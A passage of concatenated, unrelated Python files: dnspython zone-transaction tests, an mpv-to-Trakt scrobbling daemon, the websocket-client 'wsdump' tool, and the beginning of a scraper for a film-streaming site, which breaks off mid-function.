txn.delete(foo, rdata2)
assert db.rdatasets.get((foo, rdataset.rdtype, 0)) is None
def test_bad_parameters(db):
with db.writer() as txn:
with pytest.raises(TypeError):
txn.add(1)
with pytest.raises(TypeError):
rrset = dns.rrset.from_text("bar", 300, "in", "txt", "bar")
txn.add(rrset, 1)
with pytest.raises(ValueError):
foo = dns.name.from_text("foo", None)
rdata = dns.rdata.from_text("in", "a", "10.0.0.3")
txn.add(foo, 0x100000000, rdata)
with pytest.raises(TypeError):
txn.add(foo)
with pytest.raises(TypeError):
txn.add()
with pytest.raises(TypeError):
txn.add(foo, 300)
with pytest.raises(TypeError):
txn.add(foo, 300, "hi")
with pytest.raises(TypeError):
txn.add(foo, "hi")
with pytest.raises(TypeError):
txn.delete()
with pytest.raises(TypeError):
txn.delete(1)
def test_cannot_store_non_origin_soa(db):
with pytest.raises(ValueError):
with db.writer() as txn:
rrset = dns.rrset.from_text("foo", 300, "in", "SOA", ". . 1 2 3 4 5")
txn.add(rrset)
example_text = """$TTL 3600
$ORIGIN example.
@ soa foo bar 1 2 3 4 5
@ ns ns1
@ ns ns2
ns1 a 10.0.0.1
ns2 a 10.0.0.2
$TTL 300
$ORIGIN foo.example.
bar mx 0 blaz
"""
example_text_output = """@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
@ 3600 IN NS ns3
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
ns3 3600 IN A 10.0.0.3
"""
@pytest.fixture(params=[dns.zone.Zone, dns.versioned.Zone])
def zone(request):
return dns.zone.from_text(example_text, zone_factory=request.param)
def test_zone_basic(zone):
with zone.writer() as txn:
txn.delete(dns.name.from_text("bar.foo", None))
rd = dns.rdata.from_text("in", "ns", "ns3")
txn.add(dns.name.empty, 3600, rd)
rd = dns.rdata.from_text("in", "a", "10.0.0.3")
txn.add(dns.name.from_text("ns3", None), 3600, rd)
output = zone.to_text()
assert output == example_text_output
def test_explicit_rollback_and_commit(zone):
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text("bar.foo", None))
txn.rollback()
assert zone.get_node("bar.foo") is not None
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text("bar.foo", None))
txn.commit()
assert zone.get_node("bar.foo") is None
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.delete(dns.name.from_text("bar.foo", None))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.add("bar.foo", 300, dns.rdata.from_text("in", "txt", "hi"))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.replace("bar.foo", 300, dns.rdata.from_text("in", "txt", "hi"))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.reader() as txn:
txn.rollback()
txn.get("bar.foo", "in", "mx")
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.delete_exact("bar.foo")
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.name_exists("bar.foo")
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.update_serial()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.changed()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.rollback()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.commit()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
for rdataset in txn:
pass
def test_zone_changed(zone):
# Read-only is not changed!
with zone.reader() as txn:
assert not txn.changed()
# delete an existing name
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text("bar.foo", None))
assert txn.changed()
# delete a nonexistent name
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text("unknown.bar.foo", None))
assert not txn.changed()
# delete a nonexistent rdataset from an extant node
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text("bar.foo", None), "txt")
assert not txn.changed()
# add an rdataset to an extant Node
with zone.writer() as txn:
assert not txn.changed()
txn.add("bar.foo", 300, dns.rdata.from_text("in", "txt", "hi"))
assert txn.changed()
# add an rdataset to a nonexistent Node
with zone.writer() as txn:
assert not txn.changed()
txn.add("foo.foo", 300, dns.rdata.from_text("in", "txt", "hi"))
assert txn.changed()
def test_zone_base_layer(zone):
with zone.writer() as txn:
# Get a set from the zone layer
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
expected = dns.rdataset.from_text("in", "ns", 300, "ns1", "ns2")
assert rdataset == expected
def test_zone_transaction_layer(zone):
with zone.writer() as txn:
# Make a change
rd = dns.rdata.from_text("in", "ns", "ns3")
txn.add(dns.name.empty, 3600, rd)
# Get a set from the transaction layer
expected = dns.rdataset.from_text("in", "ns", 300, "ns1", "ns2", "ns3")
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
assert rdataset == expected
assert txn.name_exists(dns.name.empty)
ns1 = dns.name.from_text("ns1", None)
assert txn.name_exists(ns1)
ns99 = dns.name.from_text("ns99", None)
assert not txn.name_exists(ns99)
def test_zone_add_and_delete(zone):
with zone.writer() as txn:
a99 = dns.name.from_text("a99", None)
a100 = dns.name.from_text("a100", None)
a101 = dns.name.from_text("a101", None)
rds = dns.rdataset.from_text("in", "a", 300, "10.0.0.99")
txn.add(a99, rds)
txn.delete(a99, dns.rdatatype.A)
txn.delete(a100, dns.rdatatype.A)
txn.delete(a101)
assert not txn.name_exists(a99)
assert not txn.name_exists(a100)
assert not txn.name_exists(a101)
ns1 = dns.name.from_text("ns1", None)
txn.delete(ns1, dns.rdatatype.A)
assert not txn.name_exists(ns1)
with zone.writer() as txn:
txn.add(a99, rds)
txn.delete(a99)
assert not txn.name_exists(a99)
with zone.writer() as txn:
txn.add(a100, rds)
txn.delete(a99)
assert not txn.name_exists(a99)
assert txn.name_exists(a100)
def test_write_after_rollback(zone):
with pytest.raises(ExpectedException):
with zone.writer() as txn:
a99 = dns.name.from_text("a99", None)
rds = dns.rdataset.from_text("in", "a", 300, "10.0.0.99")
txn.add(a99, rds)
raise ExpectedException
with zone.writer() as txn:
a99 = dns.name.from_text("a99", None)
rds = dns.rdataset.from_text("in", "a", 300, "10.99.99.99")
txn.add(a99, rds)
assert zone.get_rdataset("a99", "a") == rds
def test_zone_get_deleted(zone):
with zone.writer() as txn:
ns1 = dns.name.from_text("ns1", None)
assert txn.get(ns1, dns.rdatatype.A) is not None
txn.delete(ns1)
assert txn.get(ns1, dns.rdatatype.A) is None
ns2 = dns.name.from_text("ns2", None)
txn.delete(ns2, dns.rdatatype.A)
assert txn.get(ns2, dns.rdatatype.A) is None
def test_zone_bad_class(zone):
with zone.writer() as txn:
rds = dns.rdataset.from_text("ch", "ns", 300, "ns1", "ns2")
with pytest.raises(ValueError):
txn.add(dns.name.empty, rds)
with pytest.raises(ValueError):
txn.replace(dns.name.empty, rds)
with pytest.raises(ValueError):
txn.delete(dns.name.empty, rds)
def test_update_serial(zone):
# basic
with zone.writer() as txn:
txn.update_serial()
rdataset = zone.find_rdataset("@", "soa")
assert rdataset[0].serial == 2
# max
with zone.writer() as txn:
txn.update_serial(0xFFFFFFFF, False)
rdataset = zone.find_rdataset("@", "soa")
assert rdataset[0].serial == 0xFFFFFFFF
# wraparound to 1
with zone.writer() as txn:
txn.update_serial()
rdataset = zone.find_rdataset("@", "soa")
assert rdataset[0].serial == 1
# trying to set to zero sets to 1
with zone.writer() as txn:
txn.update_serial(0, False)
rdataset = zone.find_rdataset("@", "soa")
assert rdataset[0].serial == 1
with pytest.raises(KeyError):
with zone.writer() as txn:
txn.update_serial(name=dns.name.from_text("unknown", None))
with pytest.raises(ValueError):
with zone.writer() as txn:
txn.update_serial(-1)
with pytest.raises(ValueError):
with zone.writer() as txn:
txn.update_serial(2**31)
class ExpectedException(Exception):
pass
def test_zone_rollback(zone):
a99 = dns.name.from_text("a99.example.")
try:
with zone.writer() as txn:
rds = dns.rdataset.from_text("in", "a", 300, "10.0.0.99")
txn.add(a99, rds)
assert txn.name_exists(a99)
raise ExpectedException
except ExpectedException:
pass
assert not zone.get_node(a99)
def test_zone_ooz_name(zone):
with zone.writer() as txn:
with pytest.raises(KeyError):
a99 = dns.name.from_text("a99.not-example.")
assert txn.name_exists(a99)
def test_zone_iteration(zone):
expected = {}
for (name, rdataset) in zone.iterate_rdatasets():
expected[(name, rdataset.rdtype, rdataset.covers)] = rdataset
with zone.writer() as txn:
actual = {}
for (name, rdataset) in txn:
actual[(name, rdataset.rdtype, rdataset.covers)] = rdataset
assert actual == expected
def test_iteration_in_replacement_txn(zone):
rds = dns.rdataset.from_text("in", "a", 300, "1.2.3.4", "5.6.7.8")
expected = {}
expected[(dns.name.empty, rds.rdtype, rds.covers)] = rds
with zone.writer(True) as txn:
txn.replace(dns.name.empty, rds)
actual = {}
for (name, rdataset) in txn:
actual[(name, rdataset.rdtype, rdataset.covers)] = rdataset
assert actual == expected
def test_replacement_commit(zone):
rds = dns.rdataset.from_text("in", "a", 300, "1.2.3.4", "5.6.7.8")
expected = {}
expected[(dns.name.empty, rds.rdtype, rds.covers)] = rds
with zone.writer(True) as txn:
txn.replace(dns.name.empty, rds)
with zone.reader() as txn:
actual = {}
for (name, rdataset) in txn:
actual[(name, rdataset.rdtype, rdataset.covers)] = rdataset
assert actual == expected
def test_replacement_get(zone):
with zone.writer(True) as txn:
rds = txn.get(dns.name.empty, "soa")
assert rds is None
@pytest.fixture
def vzone():
return dns.zone.from_text(example_text, zone_factory=dns.versioned.Zone)
def test_vzone_read_only(vzone):
with vzone.reader() as txn:
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
expected = dns.rdataset.from_text("in", "ns", 300, "ns1", "ns2")
assert rdataset == expected
with pytest.raises(dns.transaction.ReadOnly):
txn.replace(dns.name.empty, expected)
def test_vzone_multiple_versions(vzone):
assert len(vzone._versions) == 1
vzone.set_max_versions(None) # unlimited!
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial(1000, False)
rdataset = vzone.find_rdataset("@", "soa")
assert rdataset[0].serial == 1000
assert len(vzone._versions) == 4
with vzone.reader(id=5) as txn:
assert txn.version.id == 5
rdataset = txn.get("@", "soa")
assert rdataset[0].serial == 1000
with vzone.reader(serial=1000) as txn:
assert txn.version.id == 5
rdataset = txn.get("@", "soa")
assert rdataset[0].serial == 1000
vzone.set_max_versions(2)
assert len(vzone._versions) == 2
# The ones that survived should be 3 and 1000
rdataset = vzone._versions[0].get_rdataset(
dns.name.empty, dns.rdatatype.SOA, dns.rdatatype.NONE
)
assert rdataset[0].serial == 3
rdataset = vzone._versions[1].get_rdataset(
dns.name.empty, dns.rdatatype.SOA, dns.rdatatype.NONE
)
assert rdataset[0].serial == 1000
with pytest.raises(ValueError):
vzone.set_max_versions(0)
# for debugging if needed
def _dump(zone):
for v in zone._versions:
print("VERSION", v.id)
for (name, n) in v.nodes.items():
for rdataset in n:
print(rdataset.to_text(name))
def test_vzone_open_txn_pins_versions(vzone):
assert len(vzone._versions) == 1
vzone.set_max_versions(None) # unlimited!
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.reader(id=2) as txn:
vzone.set_max_versions(1)
with vzone.reader(id=3) as txn:
rdataset = txn.get("@", "soa")
assert rdataset[0].serial == 2
assert len(vzone._versions) == 4
assert len(vzone._versions) == 1
rdataset = vzone.find_rdataset("@", "soa")
assert vzone._versions[0].id == 5
assert rdataset[0].serial == 4
try:
import threading
one_got_lock = threading.Event()
def run_one(zone):
with zone.writer() as txn:
one_got_lock.set()
# wait until two blocks
while len(zone._write_waiters) == 0:
time.sleep(0.01)
rds = dns.rdataset.from_text("in", "a", 300, "10.0.0.98")
txn.add("a98", rds)
def run_two(zone):
# wait until one has the lock so we know we will block if we
# get the call done before the sleep in one completes
one_got_lock.wait()
with zone.writer() as txn:
rds = dns.rdataset.from_text("in", "a", 300, "10.0.0.99")
txn.add("a99", rds)
def test_vzone_concurrency(vzone):
t1 = threading.Thread(target=run_one, args=(vzone,))
t1.start()
t2 = threading.Thread(target=run_two, args=(vzone,))
t2.start()
t1.join()
t2.join()
with vzone.reader() as txn:
assert txn.name_exists("a98")
assert txn.name_exists("a99")
except ImportError: # pragma: no cover
pass
|
sync_daemon.py
|
#!/usr/bin/env python3
import json
import logging
import sys
import threading
import time
import urllib.parse
import guessit
import os
import requests
import mpv
import trakt_key_holder
import trakt_v2_oauth
log = logging.getLogger('mpvTraktSync')
TRAKT_ID_CACHE_JSON = 'trakt_ids.json'
config = None
last_is_paused = None
last_playback_position = None
last_working_dir = None
last_path = None
last_duration = None
last_file_start_timestamp = None
is_local_state_dirty = True
next_sync_timer = None
next_regular_timer = None
def on_command_response(monitor, command, response):
log.debug('on_command_response(%s, %s)' % (command, response))
global last_is_paused, last_playback_position, last_working_dir, last_path, last_duration, last_file_start_timestamp
global next_sync_timer
last_command_elements = command['command']
if last_command_elements[0] == 'get_property':
if response['error'] != 'success':
log.warning('Command %s failed: %s', command, response)
else:
if last_command_elements[1] == 'pause':
last_is_paused = response['data']
if not last_is_paused and last_file_start_timestamp is None:
last_file_start_timestamp = time.time()
elif last_command_elements[1] == 'percent-pos':
last_playback_position = response['data']
elif last_command_elements[1] == 'working-directory':
last_working_dir = response['data']
elif last_command_elements[1] == 'path':
last_path = response['data']
elif last_command_elements[1] == 'duration':
last_duration = response['data']
log.debug('is_local_state_dirty: %s\nlast_is_paused: %s\nlast_playback_position: %s\nlast_working_dir: %s\nlast_path: %s\nlast_duration: %s',
is_local_state_dirty, last_is_paused, last_playback_position, last_working_dir, last_path, last_duration)
if is_local_state_dirty \
and last_is_paused is not None \
and last_playback_position is not None \
and last_working_dir is not None \
and last_path is not None \
and last_duration is not None:
if next_sync_timer is not None:
next_sync_timer.cancel()
next_sync_timer = threading.Timer(config['seconds_between_mpv_event_and_trakt_sync'], sync_to_trakt,
(last_is_paused, last_playback_position, last_working_dir, last_path,
last_duration, last_file_start_timestamp, False))
next_sync_timer.start()
def on_event(monitor, event):
log.debug('on_event(%s)' % (event))
event_name = event['event']
# when a new file starts, act as if a new mpv instance got connected
if event_name == 'start-file':
on_disconnected()
on_connected(monitor)
elif event_name == 'pause' or event_name == 'unpause' or event_name == 'seek':
global is_local_state_dirty
is_local_state_dirty = True
issue_scrobble_commands(monitor)
def on_connected(monitor):
log.debug('on_connected()')
global is_local_state_dirty
is_local_state_dirty = True
issue_scrobble_commands(monitor)
def on_disconnected():
log.debug('on_disconnected()')
global last_is_paused, last_playback_position, last_working_dir, last_path, last_duration, last_file_start_timestamp
global next_sync_timer, next_regular_timer
global is_local_state_dirty
if next_sync_timer is not None:
next_sync_timer.cancel()
if next_regular_timer is not None:
next_regular_timer.cancel()
if last_is_paused is not None \
and last_playback_position is not None \
and last_working_dir is not None \
and last_path is not None \
and last_duration is not None:
threading.Thread(target=sync_to_trakt, args=(
last_is_paused, last_playback_position, last_working_dir, last_path, last_duration,
last_file_start_timestamp, True)).start()
last_is_paused = None
last_playback_position = None
last_working_dir = None
last_path = None
last_duration = None
last_file_start_timestamp = None
is_local_state_dirty = True
def issue_scrobble_commands(monitor):
monitor.send_get_property_command('working-directory')
monitor.send_get_property_command('path')
monitor.send_get_property_command('percent-pos')
monitor.send_get_property_command('pause')
monitor.send_get_property_command('duration')
schedule_regular_timer(monitor)
def schedule_regular_timer(monitor):
global next_regular_timer
if next_regular_timer is not None:
next_regular_timer.cancel()
next_regular_timer = threading.Timer(config['seconds_between_regular_get_property_commands'],
issue_scrobble_commands, [monitor])
next_regular_timer.start()
def is_finished(playback_position, duration, start_time):
if start_time is not None:
watch_time = time.time() - start_time
# only consider a session finished if
# at least a minimal playback position is reached
# and
# the session is running long enough
if playback_position >= config['percent_minimal_playback_position_before_scrobble'] \
and watch_time >= duration * config['factor_must_watch_before_scrobble']:
return True
return False
def is_url(url):
try:
return urllib.parse.urlparse(url).scheme != ''
except SyntaxError:
return False
def sync_to_trakt(is_paused, playback_position, working_dir, path, duration, start_time, mpv_closed):
log.debug('sync_to_trakt(%s, %d, %s, %s, %d, %d, %s)' % (is_paused, playback_position, working_dir, path, duration, start_time, mpv_closed))
do_sync = False
if not is_url(path) and not os.path.isabs(path):
# If mpv is not started via double click from a file manager, but rather from a terminal,
# the path to the video file is relative and not absolute. For the monitored_directories thing
# to work, we need an absolute path. that's why we need the working dir
path = os.path.join(working_dir, path)
for monitored_directory in config['monitored_directories']:
if path.startswith(monitored_directory):
do_sync = True
break
# empty monitored_directories means: always sync
if len(config['monitored_directories']) == 0:
do_sync = True
for excluded_directory in config['excluded_directories']:
if path.startswith(excluded_directory):
do_sync = False
break
log.debug('do_sync = %s' % (do_sync))
if do_sync:
guess = guessit.guessit(path)
log.debug(guess)
data = get_cached_trakt_data(guess)
if data is not None:
data['progress'] = playback_position
data['app_version'] = '1.0.3'
finished = is_finished(playback_position, duration, start_time)
# closed finished paused trakt action
# False False False start
# False False True pause
# False True False start
# False True True pause
# True False False pause
# True False True pause
# True True False stop
# True True True stop
# is equal to:
if mpv_closed:
if finished:
# trakt is closing and finished watching
# trakt action: stop
url = 'https://api.trakt.tv/scrobble/stop'
else:
# closed before finished watching
# trakt action: pause
url = 'https://api.trakt.tv/scrobble/pause'
elif is_paused:
# paused, while still open
# trakt action: pause
url = 'https://api.trakt.tv/scrobble/pause'
else:
# watching right now
# trakt action: start
url = 'https://api.trakt.tv/scrobble/start'
req = requests.post(url,
json=data,
headers={'trakt-api-version': '2', 'trakt-api-key': trakt_key_holder.get_id(),
'Authorization': 'Bearer ' + trakt_v2_oauth.get_access_token()})
log.info('%s %s %s', url, req.status_code, req.text)
if 200 <= req.status_code < 300:
global is_local_state_dirty
is_local_state_dirty = False
def choose_trakt_id(data, guess):
if guess['type'] == 'episode':
kind = 'show'
else:
kind = 'movie'
## the first ordered show that matches the year is the most likely true match
if 'year' in guess:
for item in data:
if item['type'] == kind:
if item[kind]['year'] == guess['year']:
return item[kind]['ids']['trakt']
else:
return data[0][kind]['ids']['trakt']
def get_cached_trakt_data(guess):
# load cached ids
if os.path.isfile(TRAKT_ID_CACHE_JSON):
with open(TRAKT_ID_CACHE_JSON) as file:
id_cache = json.load(file)
else:
id_cache = {
'movies': {},
'shows': {}
}
# constructing data to be sent to trakt
# if show or movie name is not found in id_cache, request trakt id from trakt API and cache it.
# then assign dict to data, which has the structure of the json trakt expects for a scrobble call
data = None
if guess['type'] == 'episode':
print(guess)
if 'episode' not in guess and 'episode_title' in guess:
guess['episode'] = guess['episode_title']
if guess['title'].lower() not in id_cache['shows']:
log.info('requesting trakt id for show ' + guess['title'])
req = requests.get('https://api.trakt.tv/search/show?field=title&query=' + guess['title'],
headers={'trakt-api-version': '2', 'trakt-api-key': trakt_key_holder.get_id()})
if 200 <= req.status_code < 300 and len(req.json()) > 0:
trakt_id = choose_trakt_id(req.json(), guess)
else:
# write n/a into cache, so that unknown shows are only requested once.
# without n/a unknown shows would be requested each time get_cached_trakt_data_from_guess() is called
trakt_id = 'n/a'
log.warning('trakt request failed or unknown show ' + str(guess))
id_cache['shows'][guess['title'].lower()] = trakt_id
trakt_id = id_cache['shows'][guess['title'].lower()]
if trakt_id != 'n/a':
data = {'show': {'ids': {'trakt': id_cache['shows'][guess['title'].lower()]}},
'episode': {'season': guess['season'], 'number': guess['episode']}}
elif guess['type'] == 'movie':
if guess['title'].lower() not in id_cache['movies']:
log.info('requesting trakt id for movie ' + guess['title'])
req = requests.get('https://api.trakt.tv/search/movie?field=title&query=' + guess['title'],
headers={'trakt-api-version': '2', 'trakt-api-key': trakt_key_holder.get_id()})
if 200 <= req.status_code < 300 and len(req.json()) > 0:
trakt_id = choose_trakt_id(req.json(), guess)
else:
# write n/a into cache, so that unknown movies are only requested once.
# without n/a unknown movies would be requested each time get_cached_trakt_data_from_guess() is called
trakt_id = 'n/a'
log.warning('trakt request failed or unknown movie ' + str(guess))
id_cache['movies'][guess['title'].lower()] = trakt_id
trakt_id = id_cache['movies'][guess['title'].lower()]
if trakt_id != 'n/a':
data = {'movie': {'ids': {'trakt': id_cache['movies'][guess['title'].lower()]}}}
else:
log.warning('Unknown guessit type ' + str(guess))
# update cached ids file
with open(TRAKT_ID_CACHE_JSON, mode='w') as file:
json.dump(id_cache, file)
return data
def main():
log.info('launched')
with open('config.json') as file:
global config
config = json.load(file)
monitor = mpv.MpvMonitor.create(on_connected, on_event, on_command_response, on_disconnected)
try:
trakt_v2_oauth.get_access_token() # prompts authentication, if necessary
while True:
if monitor.can_open():
# call monitor.run() as a daemon thread, so that all SIGTERMs are handled here
# Daemon threads die automatically, when the main process ends
thread = threading.Thread(target=monitor.run, daemon=True)
thread.start()
thread.join()
# If thread joins, mpv was closed.
log.info('mpv closed')
else:
# mpv not open
# sleep before next attempt
time.sleep(config['seconds_between_mpv_running_checks'])
except KeyboardInterrupt:
log.info('terminating')
logging.shutdown()
def register_exception_handler():
def error_catcher(*exc_info):
log.critical("Unhandled exception", exc_info=exc_info)
sys.excepthook = error_catcher
# from http://stackoverflow.com/a/31622038
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
if __name__ == '__main__':
import logging.config
logging.config.fileConfig('log.conf')
register_exception_handler()
main()
|
wsdump.py
|
#!/home/chuck/Desktop/Projects/Kube-Automate/venv/bin/python
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = list(map(str.strip, args.headers.split(',')))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if isinstance(data, bytes) and len(data)>2 and data[:2] == b'\037\213': # gzip magick
try:
data = "[gzip] " + str(gzip.decompress(data), "utf-8")
except:
pass
elif isinstance(data, bytes):
try:
data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
except:
pass
if isinstance(data, bytes):
data = repr(data)
if args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
else:
msg = data
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
redecanais.py
|
# -*- coding: utf-8 -*-
#
import re
import time
import shutil
import webbrowser
import http.server
import socketserver
import threading
import requests
from bs4 import BeautifulSoup
BASE_URL = 'https://redecanais.rocks'
class SimpleServerHttp:
handler = http.server.SimpleHTTPRequestHandler
def __init__(self):
print('initializing...')
self.server = socketserver.TCPServer(("", 9090), self.handler)
print("Serving at port", 9090)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
def start(self):
self.server_thread.start()
def stop(self):
self.server.shutdown()
self.server.server_close()
class Browser:
def __init__(self):
self.request = None
self.response = None
def headers(self):
headers = {
'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36',
}
return headers
def open(self, url, referer=None):
if referer:
headers = self.headers()
headers['referer'] = referer
else:
headers = self.headers()
with requests.session() as s:
self.request = s.get(url, headers=headers)
self.response = self.request.text
return self.response
class ChannelsNetwork(Browser):
def __init__(self):
super().__init__()
def search(self):
film_name = input('Digite o nome do filme que deseja assistir: ')
url_search = f'{BASE_URL}/search.php?keywords={film_name}'
return self.films_per_genre(url_search)
def films(self, url, category, page=None):
if type(category) is dict:
list_category = ['legendado', 'dublado', 'nacional']
if 'ficcao' in category['genre']:
genre = category['genre'] + '-filmes'
else:
genre = category['genre'].capitalize() + '-Filmes'
if category['category'] in list_category:
info_category = self.categories(url, category['category'].capitalize() + ' ')[0]
pages = re.compile(r'videos-(.*?)-date').findall(info_category['url'])[0]
if category['category'] == 'dublado':
print(BASE_URL + info_category['url'].replace('filmes-dublado', genre).replace(pages, str(category['page']) + '-date'))
url_category_films = BASE_URL + info_category['url'].replace('filmes-dublado', genre).replace(pages, str(category['page']) + '-date')
return self.films_per_genre(url_category_films)
else:
print(BASE_URL + info_category['url'].replace('filmes-' + category['category'], genre + category['category'].capitalize()).replace(pages, str(category['page']) + '-date'))
url_category_films = BASE_URL + info_category['url'].replace('filmes-' + category['category'], genre + '-' + category['category'].capitalize()).replace(pages, str(category['page']) + '-date')
return self.films_per_genre(url_category_films)
else:
info_category = self.categories(url, category['category'].capitalize() + ' ')[0]
pages = re.compile(r'videos(.*?)date').findall(info_category['url'])[0]
url_category_films = BASE_URL + info_category['url'].replace(pages, '-' + str(page) + '-')
print(url_category_films)
return self.films_per_category(url_category_films)
else:
info_category = self.categories(url, category.capitalize() + ' ')[0]
pages = re.compile(r'videos(.*?)date').findall(info_category['url'])[0]
url_category_films = BASE_URL + info_category['url'].replace(pages, '-' + str(page) + '-')
print(url_category_films)
return self.films_per_category(url_category_films)
def films_per_category(self, url):
html = self.open(url)
soup = BeautifulSoup(html, 'html.parser')
tags = soup.find('ul', {'class': 'row pm-ul-browse-videos list-unstyled'})
films = tags.find_all('div', {'class': 'pm-video-thumb'})
films_list = []
for info in films:
result = info.find_all('a')[1]
dict_films = {'title': result.img['alt'], 'url': BASE_URL + result['href'], 'img': result.img['data-echo']}
films_list.append(dict_films)
return films_list
def films_per_genre(self, url, category=None, genre=None):
url_genre = url
html = self.open(url_genre)
soup = BeautifulSoup(html, 'html.parser')
tags = soup.find('ul', {'class': 'row pm-ul-browse-videos list-unstyled'})
films = tags.find_all('div', {'class': 'pm-video-thumb'})
films_list = []
for info in films:
